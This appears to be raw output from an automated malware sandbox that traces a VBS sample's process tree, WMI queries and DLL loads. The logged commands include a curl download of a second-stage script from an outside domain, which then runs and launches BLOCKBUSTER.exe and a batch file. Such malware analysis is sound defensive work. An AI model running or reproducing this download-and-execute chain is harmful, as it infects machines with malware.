Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\_672365339188b\BLOCKBUSTER.exe "C:\_672365339188b\BLOCKBUSTER.exe"
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\PING.EXE	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\_672365339188b\BLOCKBUSTER.exe "C:\_672365339188b\BLOCKBUSTER.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
